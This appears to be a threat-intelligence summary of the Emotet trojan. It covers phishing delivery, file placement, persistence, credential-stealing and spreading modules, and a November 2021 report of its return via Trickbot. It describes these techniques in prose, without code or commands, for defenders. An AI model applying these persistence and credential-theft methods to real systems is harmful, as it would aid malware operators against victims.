Emotet is a pervasive and modular credential theft trojan which has historically been leveraged by threat actors in order to collect usernames and passwords for various financial institutions. However, beginning in late 2017 Emotet ceased to operate as a traditional credential theft trojan and began operating exclusively as a downloader. In its current role, Emotet is used to download a variety of secondary payloads including (but not limited to) Trickbot, Dridex, Qakbot, Ursnif, Smoke Loader, and IcedID.
Emotet is often used for widespread phishing and spear phishing campaigns. While targeting it often very broad, Emotet has begun to implement more targeted campaigns as well.
Emotet is almost always delivered through widespread or targeted phishing campaigns. These campaigns often include either an attachment, or a link to an attachment. These attachments are typically malicious macro-enabled Microsoft Office documents (often referred to simply as ‘maldocs’), which download the initial Emotet payload (Stage 1).
The Emotet malware frequently begins its installation by first choosing a filepath based on specific system characteristics; the result will generate a filepath (including he filename) composed of a concatenation of two strings drawn from a hard coded list in the malware, all of which will be stored in %APPDATA%, %LOCAL_APPDATA%. Emotet further conceals itself by removing the Zone.Identifier alternate data stream (ADS), which is typically added to files to identify that they have been downloaded from an untrusted source (e.g. the Internet).
The Emotet malware often achieves persistence through the use of the Startup folder as defined by the %CSIDL_STARTUP% variable. Emotet will insert a weaponized LNK file into this folder linking to the actual payload.
The malware itself features a number of modules which are not written to disk, but instead are loaded directly into memory from remote, hard-coded, command and control (C2) servers. These modules expand the functionality of Emotet, and include:
Mail Password Viewer
- The Mail Password Viewer is a module which loads a version of Mail PassView, allowing the threat actor to collect stored credentials, outputting them into a comma-separated value list for later data exfiltration.
Web Browser Password Viewer
- The Web Browser Password Viewer is a module which loads a version of Web Browser PassView. This module targets a number of browser types and attempts to collect stored credentials. Browsers targeted by this module include
- Internet Explorer / Edge § Firefox
- Chrome / Chromium
- Yandex Browser
Outlook Email Details Password Viewer
- The Outlook Email Details Password Viewer module is very similar to the Mail Password Viewer, except the details are not direct outputted into a comma separated value list. Additionally, the module appears to attempt to scrape additional data from unread emails in PST files.
- The Network Spreader module allows for lateral movement. This module works through attempted brute forcing of administrator credentials using a predefined list which may have been derived from the publicly available “Top 1000” password list.
- The Spammer module allows an infected host to act as a distribution mechanism for further infections using malicious Unsolicited Bulk Email (UBE). This module is typically only delivered after an infection has persisted for a significant period of time, and typically only after the threat actors have validated that it is not blocked by existing anti-spam services.
- The Proxy module, which was first identified in 2018, attempts to configure the infected system as an Internet-accessible proxy. If the device does not have an externally routable IP address, the Emotet module will attempt to reconfigure the router/firewall in front of the device with a rule utilizing Universal Plug and Play (UPnP) to make the device Internet-accessible.
Threat Update – Nov 2021
Emotet Threat Summary
The Emotet malware variant was first identified in 2014 by security researchers, and
originally created to be a banking trojan – however it has since evolved in functionality
and since its first discovery, become one of the most disruptive malware variants in the
wild. Believe to be based out of Ukraine, this infamous botnet malware-delivery system
is typically delivered via Malspam and observed to be used in tandem with other
malware like TrickBot, Qakbot and Zloader. The infrastructure sustaining Emotet was
believed to have been “dismantled” via global operation (Operation Ladybird) in January
2021 and activity was observed to have ceased.
In November 2021 researchers believed to have found the re-emergence of the Emotet
botnet. In the instances discovered, Trickbot is being utilized to install Emotet on
compromised Windows systems. Researchers are finding overlap between the new and
old variant from code and technique perspective, adding evidence of Emotet’s revival.
This discovery indicates that the actors behind Emotet are attempting to potentially get
back up and running, and should be an alarming development for security teams
Emotet Threat Synopsis
In November 2021, the Emotet malware variant was re-discovered by researchers and
believed to be a new distribution of the infamous malware. Utilizing already
compromised systems with Trickbot, the new Emotet loader is being distributed and
the new associated DLL attempting to download has been identified as Emotet. From a
techniques perspective, the infection is very similar to previous iterations. Delivery still
consists of malspam emails, arriving via malicious script, maldoc execution or malicious
links. Also, techniques such as (but not limited to) LOLBin abuse, Autorun/ASEP registry
key modifications, and Rundll32 Proxy Execution were observed previously, and early
research is showing that they have survived Emotet’s reincarnation.
The technique that was previously utilized by Emotet, abusing PowerShell commands
to download the payload via multiple web addresses, has re-emerged but with a key
difference. In the past, these PowerShell commands were obfuscated to potentially
avoid security tools and detection – with research finding base64 encoded commands
for example. However, in the latest campaign of Emotet, the threat actors have stopped
using obfuscation and opted to execute the commands in plain text. This can be due to
the operators attempting to make these commands appear more legitimate, as
obfuscation can often be viewed as a red flag for malicious intentions.
With the new samples that are being analyzed by security researchers, they have found
that once the DLL is pulled, it is stored as a random file with a .dll extension in
“C:\ProgramData”. Then subsequently it is moved to another randomly generated folder
under the infected account’s “AppData\Local” folder – which is used for persistence
purposes. It also should be noted that Emotet post-infection is now encrypted in HTTPS
rather than HTTP which was utilized in previous infections.